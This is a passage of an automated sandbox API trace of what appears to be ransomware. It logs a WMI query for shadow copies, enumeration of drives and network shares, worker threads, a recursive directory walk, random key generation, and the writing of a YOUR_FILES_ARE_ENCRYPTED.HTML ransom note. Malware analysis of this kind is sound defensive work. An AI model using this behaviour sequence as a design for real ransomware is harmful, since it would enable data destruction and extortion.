"c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 956 start_va = 0x3720000 end_va = 0x3727fff monitored = 0 entry_point = 0x37219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 957 start_va = 0x3730000 end_va = 0x3730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Thread: id = 1 os_tid = 0x8b8 [0074.968] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x777c0000 [0074.968] GetProcAddress (hModule=0x777c0000, lpProcName="NtQueueApcThread") returned 0x778370f0 [0074.968] GetProcAddress (hModule=0x777c0000, lpProcName="NtTestAlert") returned 0x77838700 [0074.968] GetCurrentThread () returned 0xfffffffe [0074.968] NtQueueApcThread (ThreadHandle=0xfffffffe, ApcRoutine=0x8db9d0, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0074.975] NtTestAlert () returned 0x0 [0074.975] VirtualProtect (in: lpAddress=0x8db9c0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19fc48 | out: lpflOldProtect=0x19fc48*=0x20) returned 1 [0075.429] VirtualProtect (in: lpAddress=0x8db9c0, dwSize=0x8, flNewProtect=0x20, lpflOldProtect=0x0 | out: lpflOldProtect=0x0) returned 0 [0082.355] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x777c0000 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="strncpy") returned 0x7783df60 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="_atoi64") returned 0x7783a700 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="atoi") returned 0x7783a730 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="isxdigit") returned 0x7783a360 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="isdigit") returned 0x7783a210 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="memset") returned 0x7783cfe0 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="memcpy") returned 0x7783c940 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="NtSetInformationFile") returned 0x77836f10 [0082.356] GetProcAddress (hModule=0x777c0000, lpProcName="NtQueryObject") returned 0x77836d80 [0082.357] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fa80, nSize=0x208 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cusersgrujadesktopca5751036a12d0.exe")) returned 0x42 [0082.357] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe\" " [0082.357] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe\" ", pNumArgs=0x19ff20 | out: pNumArgs=0x19ff20) returned 0x60e628*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe" [0082.357] LocalFree (hMem=0x60e628) returned 0x0 [0082.357] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x777c0000 [0082.358] GetProcAddress (hModule=0x777c0000, lpProcName="RtlGetVersion") returned 0x7781dbb0 [0082.358] RtlGetVersion (in: lpVersionInformation=0x8e2de0 | out: lpVersionInformation=0x8e2de0*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0082.358] GetSystemInfo (in: lpSystemInfo=0x19fcf4 | out: lpSystemInfo=0x19fcf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0082.358] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="()$&t$$\"\"%\"u$ ##)&&$t '()$pwr##(%!%p)!\" u\"$!! &ur$&r!!ws'\")st&)r)#pt& t$&r!&t)% \x11") returned 0x188 [0082.358] GetLastError () returned 0x0 [0082.358] CoInitialize (pvReserved=0x0) returned 0x0 [0082.980] CoCreateInstance (in: rclsid=0x8de14c*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x8de0ac*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x19f9ec | out: ppv=0x19f9ec*=0x60f8e0) returned 0x0 [0084.335] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765d0000 [0084.335] GetProcAddress (hModule=0x765d0000, lpProcName="IsWow64Process") returned 0x765e9f10 [0084.335] GetCurrentProcess () returned 0xffffffff [0084.335] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f9e0 | out: Wow64Process=0x19f9e0) returned 1 [0084.336] WbemContext:IWbemContext:SetValue (This=0x60f8e0, wszName="__ProviderArchitecture", lFlags=0, pValue=0x19f9b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x40, varVal2=0x0)) returned 0x0 [0084.336] CoCreateInstance (in: rclsid=0x8de13c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x8de06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f9d4 | out: ppv=0x19f9d4*=0x611c40) returned 0x0 [0084.453] WbemLocator:IWbemLocator:ConnectServer (in: This=0x611c40, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x60f8e0, ppNamespace=0x19f9f0 | out: ppNamespace=0x19f9f0*=0x623f98) returned 0x0 [0089.615] CoSetProxyBlanket (pProxy=0x623f98, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0089.616] IWbemServices:ExecQuery (in: This=0x623f98, strQueryLanguage="", strQuery="select * from Win32_ShadowCopy", lFlags=48, pCtx=0x0, ppEnum=0x19f9dc | out: ppEnum=0x19f9dc*=0x635e28) returned 0x0 [0089.952] IEnumWbemClassObject:Next (in: This=0x635e28, lTimeout=-1, uCount=0x1, apObjects=0x19f9d8, puReturned=0x19f9f4 | out: apObjects=0x19f9d8*=0x2077fd7c, puReturned=0x19f9f4*=0x0) returned 0x80041014 [0090.939] WbemLocator:IUnknown:Release (This=0x623f98) returned 0x0 [0090.940] WbemLocator:IUnknown:Release (This=0x611c40) returned 0x0 [0090.940] WbemContext:IUnknown:Release (This=0x60f8e0) returned 0x0 [0090.940] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0090.941] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0090.941] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0090.941] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0090.941] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0090.942] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0090.942] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0090.942] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0090.942] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0090.942] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0090.943] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0090.943] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0090.943] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0090.943] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0090.943] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0090.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.944] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0090.945] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0090.945] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0090.945] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0090.945] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0090.945] GetProcessHeap () returned 0x600000 [0090.946] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6368d8 [0090.947] GetProcessHeap () returned 0x600000 [0090.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6468e0 [0090.949] FindFirstVolumeW (in: lpszVolumeName=0x6368d8, cchBufferLength=0x8000 | out: lpszVolumeName="\\\\?\\Volume{4b139111-0000-0000-0000-100000000000}\\") returned 0x630488 [0090.949] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{4b139111-0000-0000-0000-100000000000}\\", lpszVolumePathNames=0x19f8a4, cchBufferLength=0x78, lpcchReturnLength=0x19fa68 | out: lpszVolumePathNames=0x19f8a4, lpcchReturnLength=0x19fa68) returned 1 [0090.951] lstrlenW (lpString="C:\\") returned 3 [0090.951] FindNextVolumeW (in: hFindVolume=0x630488, lpszVolumeName=0x6368d8, cchBufferLength=0x7fff | out: hFindVolume=0x630488, lpszVolumeName="\\\\?\\Volume{4b139111-0000-0000-0000-100000000000}\\") returned 0 [0090.951] FindVolumeClose (hFindVolume=0x630488) returned 1 [0090.951] GetProcessHeap () returned 0x600000 [0090.951] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6468e0 | out: hHeap=0x600000) returned 1 [0090.952] GetProcessHeap () returned 0x600000 [0090.952] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6368d8 | out: hHeap=0x600000) returned 1 [0090.953] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x274 [0090.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0090.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0090.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0090.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0090.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0090.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0090.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0090.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d2770, lpParameter=0x274, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0090.960] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x19fa4c | out: lphEnum=0x19fa4c*=0x626cf8) returned 0x0 [0091.704] GetProcessHeap () returned 0x600000 [0091.704] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4000) returned 0x639170 [0091.704] WNetEnumResourceW (in: hEnum=0x626cf8, lpcCount=0x19fa54, lpBuffer=0x639170, lpBufferSize=0x19fa50 | out: lpcCount=0x19fa54, lpBuffer=0x639170, lpBufferSize=0x19fa50) returned 0x0 [0091.704] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x639170, lphEnum=0x19fa28 | out: lphEnum=0x19fa28*=0x638948) returned 0x0 [0091.707] GetProcessHeap () returned 0x600000 [0091.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4000) returned 0x63d648 [0091.708] WNetEnumResourceW (in: hEnum=0x638948, lpcCount=0x19fa30, lpBuffer=0x63d648, lpBufferSize=0x19fa2c | out: lpcCount=0x19fa30, lpBuffer=0x63d648, lpBufferSize=0x19fa2c) returned 0x103 [0091.708] GetProcessHeap () returned 0x600000 [0091.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63d648 | out: hHeap=0x600000) returned 1 [0091.708] WNetCloseEnum (hEnum=0x638948) returned 0x0 [0091.708] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x639190, lphEnum=0x19fa28 | out: lphEnum=0x19fa28*=0x638948) returned 0x4b8 [0104.442] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x6391b0, lphEnum=0x19fa28 | out: lphEnum=0x19fa28*=0x638948) returned 0x4c6 [0104.447] WNetEnumResourceW (in: hEnum=0x626cf8, lpcCount=0x19fa54, lpBuffer=0x639170, lpBufferSize=0x19fa50 | out: lpcCount=0x19fa54, lpBuffer=0x639170, lpBufferSize=0x19fa50) returned 0x103 [0104.447] GetProcessHeap () returned 0x600000 [0104.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x639170 | out: hHeap=0x600000) returned 1 [0104.447] WNetCloseEnum (hEnum=0x626cf8) returned 0x0 [0104.447] GetLogicalDrives () returned 0x4 [0104.448] GetProcessHeap () returned 0x600000 [0104.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x640328 [0104.449] wnsprintfW (in: pszDest=0x640328, cchDest=32768, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0104.450] GetDriveTypeW (lpRootPathName="\\\\?\\C:") returned 0x1 [0104.450] GetProcessHeap () returned 0x600000 [0104.450] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x650330 [0104.451] lstrcpyW (in: lpString1=0x650330, lpString2="\\\\?\\C:" | out: lpString1="\\\\?\\C:") returned="\\\\?\\C:" [0104.451] lstrcatW (in: lpString1="\\\\?\\C:", lpString2="\\*" | out: lpString1="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0104.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f7ac, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6269f8 [0104.451] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.455] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0104.455] GetProcessHeap () returned 0x600000 [0104.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0104.456] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\$Recycle.Bin" | out: lpString1="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0104.456] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\*") returned="\\\\?\\C:\\$Recycle.Bin\\*" [0104.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.456] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0104.456] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0104.456] StrStrIW (lpFirst="S-1-5-18", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.456] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18") returned 28 [0104.456] GetProcessHeap () returned 0x600000 [0104.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0104.457] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18" [0104.457] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*" [0104.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620d28, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.457] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.458] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0104.458] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.458] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 40 [0104.458] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0104.458] lstrlenW (lpString=".ini") returned 4 [0104.458] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0104.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74910000 [0104.458] GetProcAddress (hModule=0x74910000, lpProcName="SystemFunction036") returned 0x74402a60 [0104.458] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0104.458] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0104.459] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19f0f4 | out: lpFileSize=0x19f0f4*=129) returned 1 [0104.459] CloseHandle (hObject=0x304) returned 1 [0104.460] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0104.460] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.460] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0104.460] GetProcessHeap () returned 0x600000 [0104.460] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x680348 [0104.460] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\s-1-5-18\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.461] WriteFile (in: hFile=0x300, lpBuffer=0x680348*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x680348*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.462] CloseHandle (hObject=0x300) returned 1 [0104.464] GetProcessHeap () returned 0x600000 [0104.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0104.464] GetProcessHeap () returned 0x600000 [0104.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0104.465] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0104.465] StrStrIW (lpFirst="S-1-5-21-1560258661-3990802383-1811730007-1000", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.465] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 66 [0104.465] GetProcessHeap () returned 0x600000 [0104.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0104.466] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000" [0104.466] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*" [0104.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620d28, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.466] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.466] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, 